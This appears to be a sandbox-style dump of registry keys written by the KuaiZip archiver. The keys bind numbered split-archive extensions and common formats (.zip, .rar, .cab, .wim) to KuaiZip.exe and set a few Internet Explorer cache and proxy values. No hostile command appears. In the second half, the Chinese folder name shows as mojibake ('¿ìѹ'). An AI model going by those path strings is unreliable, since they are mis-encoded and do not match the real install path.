"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.089]
"(Default)" = "KuaiZip.089"
[HKCR\KuaiZip.099]
"(Default)" = "快压 099 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.092]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.079\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.034\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.035]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.061\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.038]
"(Default)" = "NoAssociate.KZ"
[HKCR\.041]
"(Default)" = "KuaiZip.041"
[HKCR\KuaiZip.090\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\KuaiZip.043\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.01]
"(Default)" = "快压 01 压缩文件"
[HKCR\.092]
"(Default)" = "KuaiZip.092"
[HKCR\KuaiZip_FileAsso.Origin\.073]
"(Default)" = "NoAssociate.KZ"
[HKCR\.09]
"(Default)" = "KuaiZip.09"
[HKCR\KuaiZip_FileAsso.Origin\.052]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.057\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.011]
"(Default)" = "快压 011 压缩文件"
[HKCR\KuaiZip.045]
"(Default)" = "快压 045 压缩文件"
[HKCR\.085]
"(Default)" = "KuaiZip.085"
[HKCR\KuaiZip.011\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.094]
"(Default)" = "KuaiZip.094"
[HKCR\KuaiZip.075\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.03]
"(Default)" = "快压 03 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.012]
"(Default)" = "NoAssociate.KZ"
[HKCR\.cab]
"(Default)" = "KuaiZip.cab"
[HKCR\KuaiZip.019\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.046]
"(Default)" = "KuaiZip.046"
[HKCR\KuaiZip_FileAsso.Origin\.tgz]
"(Default)" = ""
[HKCR\.z]
"(Default)" = "KuaiZip.z"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.083]
"set" = "1"
[HKCR\KuaiZip.033\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.094\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.008]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.05]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.020\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.079]
"(Default)" = "KuaiZip.079"
[HKCR\KuaiZip.032\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.040]
"(Default)" = "KuaiZip.040"
[HKCR\KuaiZip.091\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.042]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.tgz\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.099]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.064]
"(Default)" = "快压 064 压缩文件"
[HKCR\KuaiZip.009\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.093]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.04]
"set" = "1"
[HKCR\KuaiZip.037\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.077\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\KuaiZip.050]
"(Default)" = "快压 050 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.089]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.020\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.059]
"(Default)" = "快压 059 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.034]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.053]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.067]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.kz]
"(Default)" = ""
[HKCR\KuaiZip_FileAsso.Origin\.007]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.019]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.055]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.061]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\KuaiZip_FileAsso.Origin\.015]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.044]
"(Default)" = "快压 044 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.023]
"set" = "1"
[HKCR\.048]
"(Default)" = "KuaiZip.048"
[HKCR\KuaiZip_FileAsso.Origin\.078]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.051]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.056]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.051]
"(Default)" = "NoAssociate.KZ"
[HKCR\.042]
"(Default)" = "KuaiZip.042"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\KuaiZip.wim\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.023]
"(Default)" = "快压 023 压缩文件"
[HKCR\KuaiZip.053\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.020]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.059\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.mou]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.022]
"(Default)" = "NoAssociate.KZ"
[HKCR\.008]
"(Default)" = "KuaiZip.008"
[HKCR\KuaiZip.047\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397296"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.047]
"set" = "1"
[HKCR\KuaiZip.017\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.009]
"(Default)" = "KuaiZip.009"
[HKCR\KuaiZip.013\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.096\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.019]
"(Default)" = "KuaiZip.019"
[HKCR\KuaiZip.wim\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.085]
"(Default)" = "快压 085 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.039]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.036]
"(Default)" = "快压 036 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.064]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tgz]
"set" = "1"
[HKCR\.002]
"(Default)" = "KuaiZip.002"
[HKCR\.018]
"(Default)" = "KuaiZip.018"
[HKCR\KuaiZip_FileAsso.Origin\.030]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.021]
"(Default)" = "快压 021 压缩文件"
[HKCR\KuaiZip.jar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.065\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.083]
"(Default)" = "快压 083 压缩文件"
[HKCR\KuaiZip.049\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.048\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.025]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.017]
"set" = "1"
[HKCR\KuaiZip.037]
"(Default)" = "快压 037 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.015]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.012]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.069]
"set" = "1"
[HKCR\KuaiZip.074]
"(Default)" = "快压 074 压缩文件"
[HKCR\KuaiZip.004\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.04]
"(Default)" = "快压 04 压缩文件"
[HKCR\KuaiZip.022]
"(Default)" = "快压 022 压缩文件"
[HKCR\.022]
"(Default)" = "KuaiZip.022"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.021]
"set" = "1"
[HKCR\.028]
"(Default)" = "KuaiZip.028"
[HKCR\KuaiZip.049\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.049]
"(Default)" = "快压 049 压缩文件"
[HKCR\.015]
"(Default)" = "KuaiZip.015"
[HKCR\KuaiZip.082\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.009]
"(Default)" = "快压 009 压缩文件"
[HKCR\.020]
"(Default)" = "KuaiZip.020"
[HKCR\KuaiZip.wim]
"(Default)" = "快压 WIM 压缩文件"
[HKCR\KuaiZip.019]
"(Default)" = "快压 019 压缩文件"
[HKCR\KuaiZip.050\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.093]
"(Default)" = "KuaiZip.093"
[HKCR\.095]
"(Default)" = "KuaiZip.095"
[HKCR\KuaiZip.071\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.038]
"set" = "1"
[HKCR\KuaiZip.090\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.044\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.wim]
"set" = "1"
[HKCR\.049]
"(Default)" = "KuaiZip.049"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.01]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.06]
"set" = "1"
[HKCR\KuaiZip.036\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.002]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\KuaiZip.048\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.018]
"(Default)" = "快压 018 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.09]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.zip]
"set" = "1"
[HKCR\KuaiZip.073\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.006]
"(Default)" = "快压 006 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.wim]
"(Default)" = "NoAssociate.KZ"
[HKCR\.075]
"(Default)" = "KuaiZip.075"
[HKCR\KuaiZip.078\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.cab\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.097]
"(Default)" = "快压 097 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\KuaiZip.098\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.02]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.085]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.072]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.bz2\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.038]
"(Default)" = "快压 038 压缩文件"
[HKCR\KuaiZip.04\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.013]
"(Default)" = "KuaiZip.013"
[HKCR\.072]
"(Default)" = "KuaiZip.072"
[HKCR\KuaiZip.084]
"(Default)" = "快压 084 压缩文件"
[HKCR\KuaiZip.z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.019]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.084]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.052]
"(Default)" = "快压 052 压缩文件"
[HKCR\KuaiZip.048]
"(Default)" = "快压 048 压缩文件"
[HKCR\KuaiZip.078\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.008]
"(Default)" = "快压 008 压缩文件"
[HKCR\KuaiZip.069\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.099]
"(Default)" = "KuaiZip.099"
[HKCR\KuaiZip.060\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.042\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.014]
"(Default)" = "KuaiZip.014"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.005]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.083]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.088]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.067\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.gz]
"(Default)" = "快压 GZ 压缩文件"
[HKCR\.074]
"(Default)" = "KuaiZip.074"
[HKCR\KuaiZip_FileAsso.Origin\.077]
"(Default)" = "NoAssociate.KZ"
[HKCR\.06]
"(Default)" = "KuaiZip.06"
[HKCR\KuaiZip_FileAsso.Origin\.058]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.gz]
"(Default)" = ""
[HKCU\Software\KuaiZip\KuaiZip\Setup\.006]
"set" = "1"
[HKCR\.023]
"(Default)" = "KuaiZip.023"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\KuaiZip_FileAsso.Origin\.tar]
"(Default)" = ""
[HKCR\KuaiZip.089]
"(Default)" = "快压 089 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.cab]
"(Default)" = "CLSID\{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.090]
"set" = "1"
[HKCR\KuaiZip.013\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.076]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.05\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.012\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.055]
"(Default)" = "KuaiZip.055"
[HKCR\KuaiZip.074\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.074]
"(Default)" = "NoAssociate.KZ"
[HKCR\.073]
"(Default)" = "KuaiZip.073"
[HKCR\KuaiZip_FileAsso.Origin\.7z]
"(Default)" = ""
[HKCR\KuaiZip.005\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.016]
"(Default)" = "快压 016 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.092]
"set" = "1"
[HKCR\.058]
"(Default)" = "KuaiZip.058"
[HKCR\KuaiZip.093]
"(Default)" = "快压 093 压缩文件"
[HKCR\KuaiZip.015\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.001\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.056\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.bz2]
"(Default)" = "快压 BZ2 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.026]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.kz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.027]
"(Default)" = "KuaiZip.027"
[HKCR\KuaiZip.gz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.005]
"(Default)" = "快压 005 压缩文件"
[HKCR\.037]
"(Default)" = "KuaiZip.037"
[HKCR\KuaiZip_FileAsso.Origin\.080]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.061\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.093\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.080]
"(Default)" = "KuaiZip.080"
[HKCR\KuaiZip.082\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.lzh]
"(Default)" = "KuaiZip.lzh"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.074]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.011]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.010]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.gzip]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.01]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.046]
"(Default)" = "NoAssociate.KZ"
[HKCR\.050]
"(Default)" = "KuaiZip.050"
[HKCR\KuaiZip.067]
"(Default)" = "快压 067 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.054]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.029]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.lzh]
"(Default)" = "快压 LZH 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.arj]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.030]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.024]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.06\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.066\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.080]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\KuaiZip.054\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.040]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.092\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.032]
"(Default)" = "NoAssociate.KZ"
[HKCR\.059]
"(Default)" = "KuaiZip.059"
[HKCR\KuaiZip.08\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.093\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.053\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.07]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.003\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.044]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.001\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.arj\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.030\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.096]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.043]
"set" = "1"
[HKCR\KuaiZip.004]
"(Default)" = "快压 004 压缩文件"
[HKCR\KuaiZip.077\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.091]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.035]
"set" = "1"
[HKCR\KuaiZip.gzip\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.cab]
"set" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCR\KuaiZip.030\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.027]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.093]
"set" = "1"
[HKCR\KuaiZip.032]
"(Default)" = "快压 032 压缩文件"
[HKCR\.091]
"(Default)" = "KuaiZip.091"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\KuaiZip_FileAsso.Origin\.08]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.095\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.048]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.jar]
"set" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.096]
"(Default)" = "KuaiZip.096"
[HKCR\KuaiZip.055]
"(Default)" = "快压 055 压缩文件"
[HKCR\.038]
"(Default)" = "KuaiZip.038"
[HKCR\KuaiZip_FileAsso.Origin\.014]
"(Default)" = "NoAssociate.KZ"
[HKCR\.062]
"(Default)" = "KuaiZip.062"
[HKCR\KuaiZip_FileAsso.Origin\.060]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.arj]
"(Default)" = "快压 ARJ 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.06]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.063\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.01]
"(Default)" = "KuaiZip.01"
[HKCR\KuaiZip.tar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.kz]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.032]
"set" = "1"
[HKCR\.03]
"(Default)" = "KuaiZip.03"
[HKCR\KuaiZip.058\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.071]
"(Default)" = "快压 071 压缩文件"
[HKCR\KuaiZip.023\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.066]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.007\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.037]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.zip]
"(Default)" = "快压 ZIP 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.086]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.091\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.jar]
"(Default)" = "快压 JAR 压缩文件"
[HKCR\KuaiZip.080\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.046\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tar]
"(Default)" = "快压 TAR 压缩文件"
[HKCR\.wim]
"(Default)" = "KuaiZip.wim"
[HKCR\KuaiZip.032\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.086\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.031\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.08]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.062]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\TreePanel]
"Hiden" = "0"
[HKCR\KuaiZip.033\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.mou]
"(Default)" = "KuaiZip.mou"
[HKCR\KuaiZip.051\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.02\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.062]
"set" = "1"
[HKCR\.088]
"(Default)" = "KuaiZip.088"
[HKCR\KuaiZip.rar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.07\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.014\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.073]
"set" = "1"
